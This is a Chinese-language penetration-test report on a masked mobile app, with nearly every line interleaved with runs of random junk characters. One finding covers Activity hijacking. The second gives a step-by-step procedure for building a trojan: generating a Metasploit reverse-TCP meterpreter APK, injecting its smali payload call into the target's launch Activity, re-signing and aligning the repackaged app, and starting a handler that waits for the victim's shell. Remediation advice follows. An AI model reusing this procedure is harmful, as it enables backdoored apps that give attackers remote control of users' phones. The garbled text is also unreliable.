\- H( d ?$ T( V% J, r
( _& t! ]; _" a# H0 q4 C1 {
% G; t; X* q' h# a* k: q; K/ y
0 L) e6 V9 f* o, V- |: ]
9 l9 d% M# U0 ^
2 d2 s* a* n- \: [3 u& u3 d% V. d0 b/ |$ v3 X8 w9 }* `. n) G
2 检测结果
9 e0 H1 o" [- g: Z: P/ e& F3 @; @$ F
1 J6 ~2 e W3 y' }3 }
8 ?5 [& w6 P& C* r" Z
m! S8 C# J' H- l; H6 k( P# I* Q4 ?8 O' X) Q
2.1 某某某
5 N: z" X8 A3 R/ u
6 a1 A, D" M: u. q5 m8 L/ }
6 q& I9 y& ?% n0 w* q9 a Q
. q; N0 @! D% [# m& V, \2 D ' t7 I; r0 H. F
4 \# s$ u/ [/ A1 n. N 2.1.1检测目标
/ y- F7 G1 T; e7 u! {
( V& j: G; U6 J# u( X9 M1 C
3 r1 s2 f1 Y1 `0 X, z
+ ?9 b7 G6 X: r3 L* z " L% J! }3 O* x& c. l
9 @. s* f9 Z' c4 I* R/ n" x
目标地址: 某某某某某某APP
- P) p/ [' G+ z( I- a( u$ M, v ?) l) N% e
5 K5 n, E2 y* `$ c/ f8 R- F$ K6 D) A! O! R+ v
+ p6 k% ]1 ] \. S
0 a$ s- V- U& c- O 2.1.2检测结果
# U; W1 i1 f0 j4 @7 W$ r8 D9 T
$ A2 b& W: b5 h) p9 R, ~
5 A1 J# i* y" h% L/ c: N! l) v
& f; E6 \6 m' t8 R' z$ O1 G s& J$ a 8 \" G d/ W( W( F3 W( W& Z4 V
2 m, v0 u4 D( z: ~0 M 2.1.2.1
$ @' j8 @" R7 S F
: `- i$ p" f4 d Q' E
4 {3 W: h# z4 ^: m
# L I" C( z6 ~$ C( L. T6 o! Q - }7 J P) N0 V$ I. X. S
: A: K3 t5 E' ?1 ]% i V 漏洞链接地址:某某某某某某APP * }' G+ f, i: m( k$ o- ~' z, h
$ Q z j0 T$ m$ C( m
4 v2 J {+ U) v4 t% [* i3 |8 I2 u- _
, f/ H( U& i6 y. \$ N" f" r6 v
" q0 Q9 }! K! e' n1 D+ _
- q: m7 E- a0 s: l
4 R9 B( p& w% Z" o+ m4 K5 n3 p$ @( [
+ o8 |2 t" Q7 S9 D) s8 j
' V9 p" I4 q6 v: v0 n
% U% G$ H) _2 ~! q- k- g6 ?: U; l: a, ?( D3 S- A( w& \7 C a3 L
漏洞分析及取证:
+ E1 o; M/ ^6 z0 [
: { s$ w& V4 ?4 b
. o) ]1 o( l' X# e3 [+ d+ N% V
" L9 n+ Q/ v- F6 K( x2 a% F( B
, S @" }: J5 R
6 @- w* Z. Q; c 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
- `$ T A% c" q7 X& M
0 ^4 h& G! ~: o0 b
- ?- g7 q" ~: k$ K2 L' S" ~4 n$ H R# X+ u S9 N: P0 i
& N" o! I+ ~" N \; R( C# ?
: b) Q; {9 }7 l& z- n ?4 D
9 h5 k; d8 g: J/ X# J2 B
, Q6 k" |2 f1 i: P* z
8 B3 S! s8 M( T8 z
* f1 q. r3 j" w# Q4 K1 ?5 O! M1 g
/ p1 @7 z, p' B7 Y" I% Z5 ?; }3 S( w1 ]- }( e9 [
0 V5 v3 R: o) l7 u: K9 @8 W0 E6 g5 ~- b4 r% Z; U) X# |
# G9 s3 F% ~) i
* e. J* s# V' ]# X. ~$ ^
/ @, C \( ]5 q, n3 k; I0 ^
! ~( s1 h, G9 _8 X; q4 g
/ @" y7 t6 e9 @
. ?4 x v7 R5 [% X6 m
+ I/ u! H% r9 a: C$ p; M1 R+ C3 j0 L! E; `8 Q2 q! d7 ~$ V
' w! v( }0 Q) z9 D9 d
" o" _3 N5 O# O0 t
+ J9 u0 O6 y- M5 ?- i
" B; n* Q1 B& G
+ y0 F+ ^) e7 o; C& I
: _3 t$ Y; B( {
& O) T: b' q9 H. |3 _
, ~" k- W3 C4 N4 u3 w! H! w
: ^4 D7 D f* i' s
. l1 E/ Y+ D8 T/ Y
9 i3 `1 u. G3 z2 |1 `$ X( e5 K$ Q% ?& e8 {
2 K, _4 G3 m& e N$ ^2 ~8 n
# ^/ [6 p/ G' }3 s" O 漏洞危害:高
/ N! @ x" n' n Z" N* ^+ y M, S4 M! r
$ x; ^, g: ?0 E7 b
8 k/ X; c4 D4 w3 O" n, n
! Y1 G8 B% C. h% J7 j2 k% E+ O: p, Z7 R4 R, q
6 _ w7 A8 J6 A. j% y
- z _1 m% m1 G2 m2 R
& N/ e2 [: [7 W/ g; z8 A7 n
3 a3 M$ ]% _5 D9 o/ F8 ] ' B3 j% \* n+ K+ ~* w+ f! D
- a# g' X( s: p2 }7 u. R4 U! e
0 A( L& h" h) C4 Q- ~* S; A* y( |: T! G n% |: ~8 K% {
F4 P. m+ \1 Z9 A* }
! @! r" F% n: {$ \4 Z8 v 严重程度 7 ?! t4 S5 S0 h3 n
( F" d, a Z1 U* o( R
! a( k2 K- T. w7 W
; w" |0 b$ h5 c0 k |
2 p% t4 N% t8 w s3 O% s! ]" P* E8 |& ?6 B' D! V
/ o. y8 M: M) N
5 s( B- m7 O! I( E3 {6 L
! E& P7 ]- C2 G
' t9 ~! F' D( C, Q; c/ T F2 L 高
/ p0 D6 j; G5 @5 p0 |; \( P2 B( @1 ^3 l% O) }
7 {5 N b4 W4 {1 d- k" P' ]5 h
I* K9 B$ q( i9 e1 `( N6 w
|
1 Z, L7 E- P( l6 D
( i: J9 _% F3 j# G1 h
* U. {/ ^7 _2 o. A
' M. J: \9 S% N5 F% E; G8 _ ) V0 c8 X! n& l ]" V
, y( R* V- N" p) q% @
■ 6 `. G$ Q" m% `
! r1 M- B- R& _6 n0 `3 L7 R3 g% F/ ?
5 O. @- H, `5 l0 v
{/ r5 r7 `9 s$ } |
+ [6 S; g7 o6 K$ u X s8 c# Z+ ~* b9 o3 P6 L T- E
: y9 Z. i: j6 \% R( d' c1 Q
8 s% ^, \2 h5 a
/ a9 P7 S3 G$ f. G" W
8 Z3 m. e& U3 ?3 ~3 ^, C& q 中
; s: }) t4 I2 `8 m2 L# W0 c$ g7 [7 z
4 o% w: U% i, D$ ^- N+ ^5 v
/ f; x3 Y- H+ u. ]5 q: l g4 u2 k
| ; b. M W5 L9 i' X+ n4 a, p" B5 o
4 l9 Y0 N; W- _1 {+ s( \* B/ v
. H" H, [3 ~2 Q! W7 q. K- c- w$ v$ i; P; i2 `! ~
3 K0 ~+ l4 B; u! w: v, M
T" I6 W7 I/ B5 R% z
, _$ V( `4 w8 ]: C$ i
& j0 \" {' J" n
3 d( V; U3 q% C
( m3 F. ]2 k$ o0 M6 |+ n | # ~8 k$ Y0 W( e" y( E2 N' @ @& t
/ _+ z2 E ]& J* u/ O! G % w4 _ ^3 o8 K3 |3 |# l
% s( m9 I6 t `' M: e
m, t. |8 Q9 c. L
( A% t! e5 ^ E p9 R& S
低
: [" {6 Y) \$ X1 k0 U4 i+ k& J
1 c" S- \1 s* Y1 f , p5 l5 [, q) b' r, B2 v* Z! z% L3 }
/ c. d1 ^! ~2 H1 p% M
| / {& f- l$ g m
. r. d+ _* n! E! d 4 `, Z6 d7 {- y* @
/ s3 O% p" G6 u/ e . k+ f2 g3 m% _/ O+ k
: S# C: N$ M0 k9 q3 [
$ }# C) M! n: r, ]
3 u r/ Q4 u1 w4 {. }& }
; V$ g/ y; {7 m3 [
0 q% e% O# G5 }$ N- v' s$ v0 e# N& j
| $ J# S& q. p0 [3 C' H
: y. z6 B+ Q$ ?: V8 T% W
7 f4 L+ A% ~& J+ L# e; o0 g( U/ ^6 X6 J. f: r
# s/ P9 O5 v% {7 h. Y1 P- }2 C4 j9 y
2 { U5 G% q4 L! [' z
0 e) ?0 U1 a5 P, W; U, x0 f, ^" g: v- M% h4 V
4 z9 ~5 R* h! N" ?: s
9 z5 T4 L, M- `' M5 n, Y3 Z
9 Y5 A! F* V' Y& ~& }. J, A' {4 A/ C- J* v& Q( _/ f! q
0 t) ~( z" B2 L/ b
! s# `( K4 Y/ h
& |. V/ ~: C) d5 _0 d. h3 `- }0 S4 \. u1 y
2 s% W. w W3 t X/ C/ E S4 Q* }- ?
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
) A. B. }2 V5 F8 V5 j/ V
$ g0 u# @# { S$ t
1 E4 b7 p' ? U7 e. K
+ N& |8 h9 N! m* I
( x4 \$ h7 Z6 m9 q: ?6 P& W6 `* N; v* M* Z( j5 {
" g c- }! K; ]/ l/ b" p+ S p7 N# f5 ?- R/ C% a6 ^
! u" g+ _: l, ~8 e [
" H n" c. @& B5 n l ; m- ^7 v. i, U
" z' q$ h) p) ` 5 F! ~/ k5 b% c- j
|$ [$ I8 Q, y
N) G, q" Y5 j p. s
+ I P& g5 p* H; {' n ' H5 Z; l+ n+ r4 n& [
5 r) w9 O2 g8 {; l 2.1.2.2 9 O7 V& j- l F# v. F( X* t: r
/ S7 Z) L' s1 E8 B
K3 P; r0 s- W- O9 I. i$ i
* r1 `3 N4 Y+ Z / U1 m+ Y. @0 _9 B
$ e# O% C# @# u. r
漏洞链接地址:某某某某某某APP
( W! M0 W( |! P2 y. Q) q( d V" z; x% b3 k* f; B" h
' X& w! j, Z0 I- \* J
+ }( j6 B$ ]8 Y8 A2 r
7 s8 q" m# a4 u n8 j4 k
4 Q3 k9 R8 f0 k, y3 t. I 漏洞分析及取证:
" }7 {8 t" F4 | p( B/ w" {$ ?. @& H, U/ u# I
& S4 l9 @+ t, W8 g1 j# S( S. w; w. Q
% t& a$ D% I- r* B5 x
! P- P$ g9 L6 D: B l: n; c( b2 N% e; t: n, w" Y/ e
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 9 ~/ \7 @8 H/ x: s/ }% N
6 e4 X( i. B* P4 v
7 _8 s y. ~, n- J9 h9 Y( C
" W( o9 t0 Z! l* O
& I! I B- o- o @9 g8 f& }# B1 r* t' T# l) ]' [4 Q% @$ M
用Metasploit 生成木马 apk 8 P, {' V4 Q& W; A! F
( Q7 o/ M; \* H2 S4 q
X7 n: D$ p- t! i/ ^
+ i1 l- g/ t6 a' J$ c
# ~9 _7 D# W) k$ O% M# [
$ }1 F/ _, ?! w& o& j3 t msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
2 P+ x# y$ V, H }% ?8 |" O; j% A" T
* ^" E/ q- S* ]* K7 l8 A0 a: }6 m3 K6 b2 a
6 f: A! Y' y* M
. u* r% x9 @+ f5 p: Y3 _
反编译目标apk和木马apk ' x; E$ ]2 E' A8 `' X4 a
6 h" \" R' c) w6 Y* P# H
7 N5 Y; i$ U$ r( q: X T% S
4 G' m: O7 M1 X* Y0 B+ w$ y( [ 9 V+ }( @! O x W. h# U i# m
8 c7 c0 l1 M1 o0 `7 z+ e
apktool d target.apk
1 H; Q" `# ?* k9 N3 c5 M, B" H7 k4 ^7 l
apktool d cockhorse.apk ( {' N. k. _2 ~
1 Y6 G* o/ C+ I( d. @9 K9 e: B
$ p! x' U8 {4 |2 u7 y
% {: j- D P2 p J/ m; N - e& Z1 f5 [- U9 S5 Q
% P- t2 M. e6 _) K3 E$ r 木马 apk 注入目标 apk
, v, \! T% ~+ Y# k, F- C. n
5 g) r( p2 p* R! X7 ~
& z& e8 l! R8 L+ E8 `3 f. V
) T& N% b$ K7 S! ^0 o
' J" b8 g8 ~. z% M: k: k$ h7 t# L8 Q6 O+ B2 o. `. U# v
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
. e% ^/ ]2 I& X* d4 G0 ?; D3 e! ~( d. ]! _9 {6 l! A
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
4 ^; h: X, q% O- i) c0 H2 j' X7 D8 P# R
" v$ z4 h6 q1 M6 h. E; Z# v5 R @% y
5 p! u2 a' ?& E" I
! N" X% Z0 ]2 V2 J! t2 s% Y9 q
0 x ?2 Z3 a* V* r6 q6 j5 m- [1 `# {4 P, |
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
( ~ {" _$ e# K, D1 M$ m: ~: ]4 d- r" r9 W, `0 X
: C' @& i! v% C& F; l
1 _+ l7 p3 m- M2 _% W
1 Q7 u/ }0 W; l; B# L
" r0 M! x2 @: x 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
3 }% n+ W; ]- B
. ^; M6 G& V7 R( {: m
1 j B1 E( Z9 D1 l; u
# `! L" x0 t! U9 h# o5 m; e. q & N+ j% U/ D, w; B- H
/ `) q, l$ W4 l 回编译生成最终 apk 1 j" q7 S( Q- B, T( u0 z9 v
- }& d. R0 S" J; ~& L
$ O" p5 H! }2 o9 m% z
# y% G' P4 B2 C7 a1 g
1 l' ~# b) U- p: B' r9 T6 k: V! h9 v2 F' @6 I1 m* X3 b( k3 V
重新打包 4 X2 [3 W; K# c8 o |
' @) @7 W4 X k2 j
1 d9 ~) r2 N3 W) d4 L5 h5 r+ x
; K: r( y8 j/ t' G) {2 c0 k5 i # l# L( ]8 c: n" N4 I, g
4 b# `( J6 \# y
apktool b -o repackage.apk target_app_floder
+ V# [6 W2 y2 O+ W0 _3 Y4 i; b7 |: K# \9 I
# h2 L6 I3 a9 W5 O
+ q* Q ?$ Y1 W" P* x7 z$ r {
# H+ Y! R+ q, |) @3 V+ x
. x! Y+ h! \7 F' j; Y 创建签名文件,有的话可忽略此步骤 ' R: ~7 ?- K$ x5 } }2 O
! ]+ \9 h% p" `
X2 e% i f x, _! c3 x* h
1 x1 p: P) U+ ?1 ]# ^. K
& H: S* `4 r5 m0 [8 R, u4 W9 `* B0 X+ |0 d2 N
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
- y) @- s3 D& L$ j# G
2 V0 d$ e! o( t7 v/ `: M
g! p+ `/ @/ X6 ]1 f1 E+ @
/ z+ ^6 W! {$ P
b5 v; M. l2 g6 N; a1 E
2 _; C) d8 r7 n 签名,以下任选其一
/ i4 x3 Y6 Q8 M
8 G$ A. b: T3 p2 L
+ O7 }% J1 @! ]1 u: k' N( D) d% E2 R4 G8 @% g3 v" F& ?
U, ~3 T2 G$ N& E$ ?6 ]- O- I/ P: |5 q$ C; `% A& t( n" ]7 _/ }
jarsigner 方式 ) A, ?2 @; N) v! U
5 W0 {- @ D7 S: Q
& C! y( V" c( [9 z8 \* u( i) }
8 ^2 f: c' Q6 @
; A/ G: F/ ^. g8 o' d7 I
& C) P- T, k7 {3 s( s jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " f0 d+ O: h5 u
; i$ X2 g* v+ y
+ x- y- S3 d" \2 }; o- L: ]! i/ h/ O& u0 n
5 w. S0 H0 A3 N5 k- X+ b$ W
3 w' P4 B6 `9 T8 P, Y( g$ T O3 d apksigner 方式 r* Z& s* `7 U; o1 K7 ]
( {# Z4 \- J5 \* P
k3 \: i4 H& b+ m( d
3 s% j# g, f- Z/ o g$ \' W
& F( P. F) N: s- Q: ]* o! I
2 [9 c$ r' B6 n; g! G( H$ x* v apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
- J2 l/ ]9 \' }" m$ e t' d6 @" ^3 [8 S8 r# A' Y9 |
. B6 E* y6 }5 y0 }4 {
$ w' i! ]8 f! s D- ?( Y: b8 W
, u' {! {* [( j& e5 u- c3 V( X( l2 w0 y- Q) t
如需要禁用 v2签名 添加选项--v2-signing-enabled false
: b* c" E( J- ]4 W0 B) D1 o3 l6 j
+ }6 \' F) B# l$ A2 H* j% |& w4 d; u0 I8 }
v: ?6 A9 U( Z3 k2 E
; m7 r5 e5 R$ i* X( h7 K3 U 验证,以下任选其一 9 F) k: n, s$ ^; q; W; ~5 |$ w
3 C4 J* W; ^& ^* T, ^
# }0 S, ]1 u# P2 q) @, ?
- H5 b, u$ X5 F
, W, n/ J* e5 M2 J5 ` T* ^- c$ I" D) I) b1 i
jarsigner方式 ! I2 O9 z1 |0 D0 z% Y- {
" z' }" c! J' m5 r: y0 x/ \
3 ^! a5 R/ H# u! d2 `3 G8 P2 k N( z! C$ x
6 Y- Z/ w. n p: E0 q* J
5 ^9 b0 }/ ^; X1 J jarsigner -verify repackaged.apk
# O2 `; u* F* b" X. [% x* _% u3 y4 Z, H: s& @
& U6 [- ?( \7 g
6 Y/ G) U; Z' O9 V1 g+ C 4 ?1 {* f W8 I5 Z/ }* _8 r. E
* ^& W# u! v, H apksigner 方式 + }% `0 A% ?) W9 Z& a. F' T& R
3 Q8 M( H6 b0 U- x; n! F
7 e2 Q6 x7 V$ r* r8 {, D
1 j# M! M9 O" l: R' I) R' b2 C; K
7 a1 e% y6 d8 Z0 `- z, B
2 S, o" B1 o9 A, A. D! U
apksigner verify -v --print-certs repackaged.apk 6 K0 z( }/ @! g. F1 A
7 q0 |5 [2 } t* N1 _
+ H7 i. o8 O3 o
- Y+ @: g' A) M9 Q
6 h ? l4 x/ T* N
, s' P+ E* `8 q7 L keytool方式
1 R& ~: k6 H; C8 Y, h6 c" l6 F D$ q8 S/ A [$ a- C
2 | @3 l! y4 K$ n! m1 \2 e% c# O
1 J" k& Y; Z. c1 }; @+ ] 2 u, X3 W* _6 B% v; M: |+ w5 t
U/ v" G7 ]0 j$ U! x
keytool -printcert -jarfile repackaged.apk 8 g I# I, G0 i# [( m. J, i
+ b2 h: i+ J4 y
8 I9 l2 h! U+ M( e. @
$ p; H' m1 s6 f! P$ ?' y2 ^' Y
) X' H, H+ {& K/ Q% H2 ^, c; P; ~- p$ W- }0 E8 B, Q* ]
对齐 ; {$ O2 g+ C5 o! E, M3 v4 U( Q
; P* u* R4 f) i% I
7 Y7 i9 s% w3 u, N$ T; Q& c
; F0 M6 _! t6 K; @& Y4 G, \
: b- V+ D! r |2 i4 J G/ y" H5 i4 _( u" U' q# s! f3 j* S
字节对齐优化 0 ]; ]% ?' }( J8 ^
7 q5 Q; { w: d* {3 m
- P& f* ^+ f$ M9 t# u
9 v7 @8 c9 ~0 E7 n, Z, h7 b / M9 i1 f, s2 S$ N- i* b
/ q* l1 ]2 ]: V( Y zipalign -v 4 repackaged.apk final.apk
: q7 `, m, ]4 o+ z) d, l) B, y6 G% x( w; F# D' h6 z
6 N# y- X6 a, Y2 V
+ q0 y* J$ N5 O) k" ]$ a
" ~+ ~; J0 w% T Z1 A( w1 H
0 l" [9 w! Z. z5 {( d 检查是否对齐
% C: H4 Y( A2 L- ]5 E% c
2 n# k# t' x! i7 d7 {) m: f
1 K) X1 @2 V0 ?' p
6 i3 u" }. K& z0 Z3 ~3 c
: s9 f; I: ?( b# a) x: R
0 K4 y: J. N. _3 z5 X
zipalign -c -v 4 final.apk
. u. B: }. `' K2 V7 t4 S# H$ I( }6 r. t0 Z+ T1 `7 m
- J, ~2 |/ ^4 h" N! t S( H- ]
8 ?. f& n: n! {- \) ?& l
4 D0 L0 a) g" s# z( c9 ~/ x/ S
# ?% _5 A* w" e 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + o+ O% s: @4 k* m/ K9 q: j# G, u
5 n. `9 e: x) Z. n3 b2 C
# w7 R, d$ b2 G+ c2 E3 W
1 v" e; u& P4 ?' g: L ; C* ^1 o: w; p3 B" W4 e
5 L( C/ d2 }7 S7 D* F 启动Metasploit控制台,配置参数等待上线
2 R5 c$ \* {7 s/ [) [& {, l
# [. Y! i6 K$ [- _+ b! d, B& O
6 A# @# P w3 h" `% y2 |% x l! h4 ]/ c& Z; R( n9 R+ n. ]
, `8 n8 K7 x5 t4 G! p4 a0 n
' R p3 f9 D9 f7 \! Z% I 在终端依次输入如下命令 7 X0 W1 L8 |- w3 W A* k/ ]
8 m" o8 c4 q6 {8 O. j
4 h. _/ D7 N, a }( N5 } _8 E
1 a S- Z2 G6 e& C
# J6 p l$ |1 O) f
# z n$ E/ ]# I5 {' B. y' i msfconsole
2 x" O: \3 L4 I, H2 o9 ?- [! v3 d0 A/ U& r1 `' {
6 @5 Z- z& d* b) H
( D6 j9 B6 U W" X $ k- \6 M i1 G( c- P
6 x+ g4 S/ a% C. E' Z& R% m use exploit/multi/handler 3 N3 ~( i" c) T% x! j: `
8 O8 Q& J& @7 x
8 m5 N. d3 @% I( S3 s) ?
" N1 y" G" A/ }/ a* t7 A2 [: C) c / h5 u2 a# Z+ p/ I$ [2 l" w6 A3 `5 C
4 V A2 z7 Y4 y& Y
set PAYLOAD android/meterpreter/reverse_tcp 4 J* p4 B" x$ n
: d; M- ]3 w$ ?; k
; k; K- D) @% t" }
. A G, K$ R3 R2 ^8 B& F G
' u- }& F: i9 G' J& K
0 s$ w, U3 K! C9 K5 }
set LHOST 192.xxx.xx.xx 0 |. E# @9 F3 y# j" k3 v; b
. d2 e o/ t' t6 n: |5 a1 C
$ [& X) p* I/ j0 z- ^! I, Q0 M/ o
' x- S3 }$ Z. I
& n0 `7 l; X) f" G
* u4 o' [" U0 E% }* \4 d! ^ set LPORT 4444 8 |: } I+ O* Z" T* l
; T/ w8 O- f2 p8 y' t2 l( _
1 x" v2 L* `( _' E3 v/ I; c- J
' y, D9 e6 I! t w9 F2 s
+ y% `6 G: {; `/ Q8 V U$ ~3 a; V5 K- K8 S% ?6 Y
exploit
* [$ x2 f) ~ t. F d9 I# y2 h5 J, c3 B
# ]" E" u+ f9 ^* c$ E4 M- z% X1 W+ y1 e# B; `( A- p
+ r- e: E K K+ U+ V4 R- \9 r
0 b+ b$ |! h" |6 V4 y 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
) u m$ X" c/ y+ c
+ J" s2 _* c# V( f8 d1 A
% S& I; {! e' ?- D- C m
9 g( |; t3 [1 r) l$ s3 f7 d
$ ?7 e# \7 `; N" \$ w" z; p) G) p$ k
# S) H1 J% V0 @ 漏洞危害:中 ( \# S \; J A0 s$ c
' \2 I% I: W; C! y' l# L
& ?! d' v; e, V0 R# e3 A- r
" g5 X; G8 w) |( R$ a 3 ?# y6 X2 \) d7 D0 X$ g3 e
9 w$ k! R. `9 t7 A7 V- X) \' ~1 B
* `4 O+ A( @. X# h4 W6 H
( }4 ~ O6 w* H6 J# ?0 B
/ ?! c# w1 y8 F6 @1 [& ?
: A) F( a% y3 X# {' x- f ; D. d: S- l$ _! k4 K e
. }4 {$ T8 ?' h( m9 p
- `1 _2 _ _, e& b! Z2 V
' Q6 f8 @3 b; d ) Y3 a4 U Y/ [+ C1 P: N
% W: ?; A7 l2 o9 I/ s& r ; q7 |: Y) @- Q, J5 r3 X2 H% {
# H V$ b( Z4 j0 b5 D c 严重程度 ( {* X( W9 x4 ?4 Q# K! f4 ]( T
: `1 o' \- u9 s, f6 v
% P' @6 M! l& C/ s7 f& m7 p" s
' R( N- P- y6 i7 c | - p0 X- Q0 O. Q
6 M2 ^, v W7 y' q& y3 u `
& ]; Z2 {3 \# J: Y# P+ ]! I
& R5 `8 p! |" |3 G% u7 s4 }) q( P
9 X y! z7 P7 X( W2 x l P, S
% s o e/ `9 M 高
: c, P: b' Y, O$ K
1 x6 C5 n* M+ t' p - ]9 ~4 Z8 ]' `% }
7 a6 i9 Q! m! a! l. O7 e
|
8 c% `7 _8 S% b6 Q3 E/ r5 r5 z3 ^
" y6 Q6 b% ]) B0 i& h, v6 G 6 n1 b8 {( h" H
4 R0 I/ b. U# g& k8 H. c" Z
+ R6 I/ |+ f) E# O- e" _3 k) h$ [5 l+ U2 w! r4 ~+ z
■
# T# x5 A1 u0 Y( v k3 {4 M7 ^- S4 U; N5 z: B, n Q
4 P4 q2 v9 R& `$ f/ |4 V
9 L) E; w- U# M* M6 G | 0 n7 R; j" @! E) i* O2 {5 F
8 e1 m. G- c1 O ( e" n3 E+ s6 e1 E; t
% P5 Q/ \6 `2 q0 a ?4 _/ s . d0 f2 W- X) [ o+ b
$ R4 A" _/ t; O$ U$ J 中 : b7 N& b# X/ r' B# F# t1 p- b
( p3 C; e; k+ E/ }7 l |
, i9 A3 K* g1 y8 W9 Q, K4 w* o+ J' c _
|
- Z, P2 B2 n* M4 |
) w# ^. l* A0 U" C0 Z# }
# q9 Y0 b' v- @+ n% `; K- H1 T0 ?6 |/ u$ U2 _+ G
% ` _0 z. l, F* }+ q5 k! ]
0 y: y5 ^. ~( X2 u1 y3 Z1 g( }
6 v2 A! w$ Q, ~. `4 i& L* ?7 |8 B- F1 g$ F+ c" I
! X/ @* a; n* `) D7 X% \
( x2 M/ s; N/ j4 n
. ]: j* K) R( n9 u' H8 N
$ I5 a) @7 R, X# O" w |
1 x! a5 Y, I9 t
, `+ ?0 B* W5 _- S
0 Y( x3 ?& h9 o) }4 w' Q* T3 k
g8 J0 ~: G y1 {# q+ c# [
9 F, M$ M: U |, x6 B) j3 Y 低 ( m2 E5 m2 p% G- F3 N' l
# S: X: r5 N `, x
( g t% F. N1 ]+ r$ F" a3 d! a
5 w7 p* q3 c1 C- r | : t8 o+ C6 x4 |+ z. }
' K7 c4 J1 w/ a; ] " T3 W/ `! a& c. r' @1 v# R7 L$ r
, S3 O# x3 y( v) p' E- q2 A
5 S s' z' ~/ D1 P7 c8 T& H3 O) m: R7 ]4 j8 I6 l
3 s8 ^. n: y# H2 l: F) U- W3 ]& q) n, C Y% L7 |0 K
4 m1 L* T! U; W' F$ Y" X2 o6 g2 n# W" c: G: Z
/ _7 u- H2 T) Y5 x- h, z% G- J
: |9 q" o$ W7 f) T |
2 |1 ~: \+ Q4 r8 U6 V+ j* M2 a3 O+ [. P. T8 C0 A- j
: O" C# a! W* _4 O
! B: T2 l) D. U& V# u9 J+ d6 J
" L3 `* i/ g: j7 l" w E% l5 c$ h3 A! G. r" c- ^
2 Y, r- b- s- R, s: q2 X/ Z
# e- K; e1 \! i
( d/ F- l' ~8 |5 p( C8 m
Y3 v! B! m) ~4 p* Q% B 0 o1 L0 m& d9 L8 {1 I
8 y* a+ x) e; u: }5 N + ?8 V/ E7 K9 v/ m* U8 J
! _4 `- B# G& _
7 n+ A4 R$ e0 a5 n
) _4 l# [6 e- [/ @ V
% v% Q4 Z4 {) e g- Q* W9 r
4 g ~7 F% Q, N5 f& Z0 Q! T 修复方法:
+ h* H# z2 `" ]2 K1 y8 {7 A: q9 N! \" U" ?" U" [
0 ?2 V; U: b: |
* Z7 W/ n0 `' K2 @) n: c4 q* y
& A P1 _6 _9 {0 C
- v% c' L! _% l4 z4 m 1.在 APP 启动时应做签名校验防止二次打包。
& f |! T5 [9 X- Q
+ y8 k1 J( `* ~* |) S5 N( x- f 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
( J1 J* w6 m' Z4 [8 X( q" }0 a8 |% ~9 x5 X
7 f1 ?) t9 }: Y
4 O$ z( F* i- y, f % h% U( d+ a1 e5 O
8 k7 c" j- L9 G% L6 T
( @0 A9 j7 [ L* d0 i1 v2 ]' n+ |: i- z8 q
- J; l, g1 |# d& d E6 I
6 l; H n+ b, p7 s& z \
+ k6 @$ I; ]. {+ K1 t6 ^2 {
" R& G8 |, w1 h& q6 ] * |- J% h% J' j' i9 |
' K: p. c1 @: f. o) k2 j! c; z
( z0 U K' D# n1 [ O* U- u7 [5 e3 d
* o5 }5 e- `* _
1 w1 |1 U; h& [; F( U
' f% n' a% J% F& r& h
8 u8 O* A4 c' z* M